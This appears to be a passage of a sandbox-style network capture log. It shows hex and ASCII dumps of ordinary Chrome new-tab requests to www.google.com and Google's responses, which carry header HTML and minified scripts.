                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 31 35 63 64 0d 0a 57 4a 46 57 44 4e 32 59 55 70 53 53 6b 4a 4b 55 55 6c 4c 54 58 4a 45 52 6b 52 50 62 58 42 78 62 46 59 77 4d 7a 4e 30 65 57 6c 34 64 6a 56 31 54 47 55 72 54 48 4d 33 65 48 4e 78 64 7a 56 58 52 31 67 77 63 6a 4a 4e 64 46 56 30 4e 32 78 30 4d 48 56 69 4f 55 39 30 4b 32 63 32 57 56 64 56 56 7a 4a 75 61 46 56 54 52 6b 70 59 61 6a 42 74 62 6e 70 70 54 55 64 72 61 6c 46 4c 4d 47 6c 6d 57 6e 52 30 59 30 56 72 55 48 56 69 62 6e 5a 5a 4b 7a 4a 47 59 7a 42 6f 63 55 4a 45 62 55 74 56 4e 48 70 74 54 6a 49 35 54 32 4a 33 54 33 4a 72 61 32 52 55 53 48 46 57 61 47 5a 5a 51 6d 64 4f 61 6a 51 7a 4d 32 5a 73 64 6c 56 56 63 6e 64 57 52 6b 4e 52 61 6a 41 77 57 6b 31 6a 5a 46 4e 4d 61 6d 31 50 62 30 46 6e 5a 32 4e 31 65 48 59 77 55 46 52 44 64 47 5a 73 59 6c
                                                                                                                                                                                                                                                              Data Ascii: 15cdWJFWDN2YUpSSkJKUUlLTXJERkRPbXBxbFYwMzN0eWl4djV1TGUrTHM3eHNxdzVXR1gwcjJNdFV0N2x0MHViOU90K2c2WVdVVzJuaFVTRkpYajBtbnppTUdralFLMGlmWnR0Y0VrUHVibnZZKzJGYzBocUJEbUtVNHptTjI5T2J3T3Jra2RUSHFWaGZZQmdOajQzM2ZsdlVVcndWRkNRajAwWk1jZFNMam1Pb0FnZ2N1eHYwUFRDdGZsYl
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 55 6c 67 34 51 55 6f 7a 62 57 56 77 59 6e 70 50 4d 48 51 7a 51 6e 68 30 56 43 39 73 62 6d 34 76 5a 6c 5a 59 4c 32 4a 36 4e 79 39 6e 4d 54 56 46 56 6c 6c 6d 65 44 68 32 57 43 39 5a 55 30 31 30 54 55 63 7a 4c 33 51 32 55 33 64 33 54 6c 52 70 56 58 6c 6f 63 6d 63 32 62 6e 45 7a 4b 30 64 68 63 6b 31 57 5a 47 52 4b 4e 44 56 55 62 31 4a 50 54 6c 64 5a 57 55 38 7a 63 46 70 68 53 6b 6f 72 56 54 4e 44 64 6c 4a 56 54 30 52 51 52 6c 64 74 5a 55 6c 53 5a 56 42 48 5a 57 4a 52 56 54 4e 4f 56 56 52 34 61 55 77 78 62 6c 70 57 61 6d 6f 76 64 46 70 6f 4b 30 70 46 52 69 74 52 56 6a 45 34 62 45 78 59 5a 48 6f 35 54 32 74 53 56 58 4a 42 4d 58 56 6a 4e 55 70 74 54 46 49 32 64 6d 78 79 55 47 31 4e 65 46 64 77 52 46 64 69 62 44 4a 4e 54 46 56 4c 4d 6b 39 36 52 32 64 5a 56 7a 4e
                                                                                                                                                                                                                                                              Data Ascii: Ulg4QUozbWVwYnpPMHQzQnh0VC9sbm4vZlZYL2J6Ny9nMTVFVllmeDh2WC9ZU010TUczL3Q2U3d3TlRpVXlocmc2bnEzK0dhck1WZGRKNDVUb1JPTldZWU8zcFphSkorVTNDdlJVT0RQRldtZUlSZVBHZWJRVTNOVVR4aUwxblpWamovdFpoK0pFRitRVjE4bExYZHo5T2tSVXJBMXVjNUptTFI2dmxyUG1NeFdwRFdibDJNTFVLMk96R2dZVzN
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 4a 78 55 54 64 34 59 57 35 31 4f 54 4a 50 65 54 6c 4f 54 57 4a 30 4e 43 39 42 4e 45 4a 68 53 58 5a 49 4e 57 6c 4d 62 46 4e 58 51 7a 42 45 4d 6c 42 78 56 47 67 77 55 48 49 77 54 54 6c 73 55 32 56 36 4d 54 64 4f 62 55 31 6f 64 46 6b 72 5a 6e 6f 35 54 45 68 58 64 32 64 58 52 56 6c 71 61 6d 74 53 52 6b 4e 78 53 47 5a 45 59 6d 64 70 54 6c 4a 33 4c 33 67 76 56 57 56 4f 64 54 52 69 55 58 68 44 4e 6e 70 72 5a 6c 6b 35 52 32 78 46 63 6e 51 33 52 32 74 30 57 6d 68 71 4f 47 74 6f 54 43 39 6d 53 6a 56 56 56 47 64 55 59 56 46 45 61 30 56 72 57 6c 56 42 53 32 6c 47 4d 58 56 6f 4d 32 56 69 4e 47 45 79 63 54 68 46 63 48 52 6f 51 56 52 68 4e 53 74 76 52 6c 4e 6a 52 48 52 75 57 48 6c 4a 4e 48 6b 30 64 6a 52 57 59 6e 67 30 61 31 46 33 54 32 64 53 65 55 4a 4d 56 79 74 43 4d
                                                                                                                                                                                                                                                              Data Ascii: JxUTd4YW51OTJPeTlOTWJ0NC9BNEJhSXZINWlMbFNXQzBEMlBxVGgwUHIwTTlsU2V6MTdObU1odFkrZno5TEhXd2dXRVlqamtSRkNxSGZEYmdpTlJ3L3gvVWVOdTRiUXhDNnprZlk5R2xFcnQ3R2t0WmhqOGtoTC9mSjVVVGdUYVFEa0VrWlVBS2lGMXVoM2ViNGEycThFcHRoQVRhNStvRlNjRHRuWHlJNHk0djRWYng0a1F3T2dSeUJMVytCM
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 52 47 68 73 64 46 6f 33 55 45 5a 36 5a 54 4e 45 4f 58 70 55 57 6b 70 57 5a 33 46 4f 63 55 4e 54 5a 6b 56 4c 64 44 56 4a 56 45 4e 31 62 45 6c 71 52 58 64 68 4d 43 39 76 61 57 73 31 65 6a 6c 56 65 6e 41 33 64 56 45 77 63 57 70 69 4e 54 4d 79 59 6e 42 72 62 57 46 6f 4d 6d 6c 52 65 55 68 52 4c 31 68 4d 62 6a 68 53 59 56 68 73 52 55 39 50 57 44 64 4a 4f 57 4e 52 63 54 41 34 63 56 5a 72 61 31 59 34 4c 32 30 31 65 6a 5a 55 4c 7a 5a 55 59 6d 4a 77 57 6c 4d 32 57 6a 6c 4c 52 69 39 78 5a 58 49 79 55 56 59 77 54 7a 4d 33 56 44 4a 4f 52 56 42 6e 61 56 4a 4b 59 6c 4e 75 4e 6c 4e 59 61 44 42 35 53 32 31 4c 4c 31 64 54 64 31 5a 32 56 32 4a 48 55 33 70 4f 65 58 6c 45 52 57 56 71 4e 57 56 4c 63 30 39 55 55 44 42 54 62 48 55 77 61 58 42 6b 5a 57 68 33 61 45 31 4c 56 47 56
                                                                                                                                                                                                                                                              Data Ascii: RGhsdFo3UEZ6ZTNEOXpUWkpWZ3FOcUNTZkVLdDVJVEN1bElqRXdhMC9vaWs1ejlVenA3dVEwcWpiNTMyYnBrbWFoMmlReUhRL1hMbjhSYVhsRU9PWDdJOWNRcTA4cVZra1Y4L201ejZULzZUYmJwWlM2WjlLRi9xZXIyUVYwTzM3VDJORVBnaVJKYlNuNlNYaDB5S21LL1dTd1Z2V2JHU3pOeXlERWVqNWVLc09UUDBTbHUwaXBkZWh3aE1LVGV
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC29INData Raw: 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: "QUERY","QUERY","ENTITY"]}]
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              60192.168.2.450257172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:01 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:02 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC372INData Raw: 31 38 62 33 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                              Data Ascii: 18b3)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                              Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                              Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                              Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                              Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC399INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 37 37 2c 33 37 30 30 39 34 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 2c 31 30 32 32 37 38 32 30 38 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63
                                                                                                                                                                                                                                                              Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700277,3700942,3701384,102278205,102278208],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(func
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC237INData Raw: 65 37 0d 0a 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: e7C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpExcep
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 38 30 30 30 0d 0a 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64
                                                                                                                                                                                                                                                              Data Ascii: 8000tion(e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c
                                                                                                                                                                                                                                                              Data Ascii: ew _.Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a|0:void 0};_.Od\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC1390INData Raw: 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65
                                                                                                                                                                                                                                                              Data Ascii: eturn _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b),c)};_.ce\u003dfunction(a,b,c\u003d0){return _.tb(_.S(a,b),c)};_.e


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              61192.168.2.450258172.217.19.228443
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:19:01 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-22 01:19:02 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:19:02 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
